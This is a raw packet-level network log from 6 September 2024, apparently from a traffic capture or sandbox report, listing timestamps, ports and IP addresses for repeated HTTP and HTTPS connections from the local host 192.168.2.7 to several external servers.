Sep 6, 2024 09:58:10.299724102 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299734116 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299746037 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299762964 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299766064 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299783945 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299810886 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.299858093 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299870014 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.299911022 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.334076881 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334121943 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334136963 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334150076 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334153891 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.334163904 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334177017 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334191084 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334197998 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.334197998 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.334204912 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.334249973 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345208883 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345227957 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345247984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345277071 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345283031 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345300913 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345313072 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345324993 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345335960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345339060 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345347881 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345359087 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345360041 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345374107 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345388889 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345417023 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345419884 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345458031 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345585108 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345596075 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345607996 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345618963 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345621109 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345634937 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345635891 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345655918 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345683098 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345721960 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345733881 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345746040 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345753908 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345757961 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345769882 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345771074 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345783949 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345787048 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345796108 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.345804930 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.345834017 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.381484032 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381505013 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381516933 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381529093 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381541014 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381552935 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381563902 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381567955 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.381580114 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.381635904 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382038116 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382047892 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382059097 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382070065 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382081985 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382082939 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382093906 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382106066 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382117033 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382117033 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382144928 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382391930 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382417917 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382428885 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382436991 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382450104 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382457018 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382462025 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382472038 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382476091 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.382493973 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.382517099 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.392250061 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392285109 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392297983 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392308950 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392322063 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392333984 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392332077 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.392347097 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392366886 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392368078 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.392388105 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392399073 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392400980 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.392411947 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392412901 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.392424107 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392438889 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:10.392457008 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.392467022 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:10.392496109 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:11.100179911 CEST	49720	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:11.101710081 CEST	49722	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:11.106117964 CEST	80	49720	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:11.106173992 CEST	49720	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:11.107925892 CEST	80	49722	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:11.107997894 CEST	49722	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:11.108283043 CEST	49722	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:11.116648912 CEST	80	49722	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:11.185091972 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:11.189960003 CEST	80	49723	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:11.190201998 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:11.191072941 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:11.196327925 CEST	80	49723	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:11.813432932 CEST	80	49722	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:11.813496113 CEST	49722	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:11.818186045 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 6, 2024 09:58:11.825426102 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:11.825762033 CEST	49724	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:11.830732107 CEST	80	49724	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:11.830811024 CEST	49724	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:11.830966949 CEST	49724	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:11.830988884 CEST	80	49721	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:11.831079960 CEST	49721	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:11.835942030 CEST	80	49724	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:11.956228971 CEST	80	49723	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:11.956305027 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:11.966687918 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:11.971645117 CEST	80	49723	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:12.224637032 CEST	80	49723	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:12.224838972 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:12.535512924 CEST	80	49724	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:12.535578966 CEST	49724	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:13.500818014 CEST	49722	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:13.501137972 CEST	49727	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:13.506043911 CEST	80	49727	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:13.506113052 CEST	49727	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:13.506241083 CEST	80	49722	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:13.506329060 CEST	49722	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:13.538420916 CEST	49727	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:13.544852972 CEST	80	49727	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:14.210216045 CEST	80	49727	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:14.210325956 CEST	49727	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:14.684214115 CEST	49727	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:14.684709072 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:14.689304113 CEST	80	49727	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:14.689389944 CEST	49727	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:14.689481974 CEST	80	49728	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:14.689573050 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:14.723800898 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:14.728640079 CEST	80	49728	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:15.225215912 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:15.225255966 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:15.225349903 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:15.225883961 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:15.225903988 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:15.399708986 CEST	80	49728	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:15.399959087 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:15.501863956 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:15.506957054 CEST	80	49728	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:15.731242895 CEST	80	49728	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:15.731306076 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:15.992986917 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:16.020628929 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:16.020654917 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:16.021816015 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:16.021878958 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:16.110861063 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:16.111205101 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:16.116023064 CEST	80	49738	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:16.116060019 CEST	80	49728	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:16.116127968 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:16.116153002 CEST	49728	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:16.123078108 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:16.123270035 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:16.128027916 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:16.128056049 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:16.170217991 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:16.175079107 CEST	80	49738	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:16.196182013 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:16.824513912 CEST	80	49738	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:16.824567080 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:16.839005947 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:16.843818903 CEST	80	49738	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:16.994223118 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:16.994426966 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:16.994535923 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:17.049478054 CEST	49735	443	192.168.2.7	94.245.104.56
Sep 6, 2024 09:58:17.049518108 CEST	443	49735	94.245.104.56	192.168.2.7
Sep 6, 2024 09:58:17.072287083 CEST	80	49738	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:17.072436094 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.222593069 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.222928047 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.225291967 CEST	80	49723	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:17.225361109 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:17.228897095 CEST	80	49744	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:17.228943110 CEST	80	49738	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:17.228987932 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.229011059 CEST	49738	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.254513979 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.264652014 CEST	80	49744	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:17.940279961 CEST	80	49744	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:17.940347910 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.970772028 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:17.975591898 CEST	80	49744	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:18.203072071 CEST	80	49744	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:18.203192949 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:18.354724884 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:18.355010033 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:18.359946966 CEST	80	49749	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:18.360039949 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:18.360248089 CEST	80	49744	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:18.360337019 CEST	49744	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:18.366990089 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:18.371799946 CEST	80	49749	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:19.069739103 CEST	80	49749	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:19.069835901 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.096915960 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.101986885 CEST	80	49749	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:19.327188015 CEST	80	49749	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:19.327263117 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.434288025 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.434318066 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.434381962 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.434765100 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.434786081 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.434843063 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.435512066 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.435522079 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.435641050 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.435652018 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.529840946 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:19.529881001 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:19.530047894 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:19.530927896 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:19.530939102 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:19.586112976 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.586699963 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.591290951 CEST	80	49749	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:19.591356993 CEST	49749	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.591641903 CEST	80	49758	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:19.591715097 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.603224039 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:19.608011007 CEST	80	49758	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:19.975284100 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.975666046 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.984806061 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:19.989268064 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.989289999 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.989378929 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.989392996 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.989562988 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:19.989574909 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:19.990475893 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.990536928 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.990549088 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.990602970 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.990741014 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:19.990847111 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:19.993510008 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.993586063 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.993949890 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.994026899 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.994731903 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:19.994810104 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:19.995019913 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.995029926 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.995240927 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:19.995254040 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:19.995554924 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:19.995560884 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:20.069685936 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.069962025 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.085668087 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:20.095163107 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.095232964 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.095393896 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.095649958 CEST	49755	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.095669031 CEST	443	49755	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.103669882 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:20.103745937 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:20.103791952 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:20.103913069 CEST	49757	443	192.168.2.7	162.159.61.3
Sep 6, 2024 09:58:20.103930950 CEST	443	49757	162.159.61.3	192.168.2.7
Sep 6, 2024 09:58:20.105050087 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.105128050 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.105223894 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.105308056 CEST	49756	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.105320930 CEST	443	49756	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.287305117 CEST	80	49758	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:20.287370920 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.324762106 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.329528093 CEST	80	49758	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:20.500135899 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.500165939 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.500230074 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.500365973 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.500407934 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.500457048 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.500614882 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.500627041 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.500741005 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.500755072 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.550503016 CEST	80	49758	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:20.550565958 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.760416031 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.761488914 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.765629053 CEST	80	49758	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:20.765678883 CEST	49758	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.766408920 CEST	80	49761	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:20.766475916 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.766619921 CEST	49761	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:20.771909952 CEST	80	49761	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:20.835071087 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:20.835110903 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:20.835185051 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:20.835845947 CEST	49762	443	192.168.2.7	142.250.64.97
Sep 6, 2024 09:58:20.835860014 CEST	443	49762	142.250.64.97	192.168.2.7
Sep 6, 2024 09:58:20.953702927 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:20.954238892 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:20.954253912 CEST	443	49760	172.64.41.3	192.168.2.7
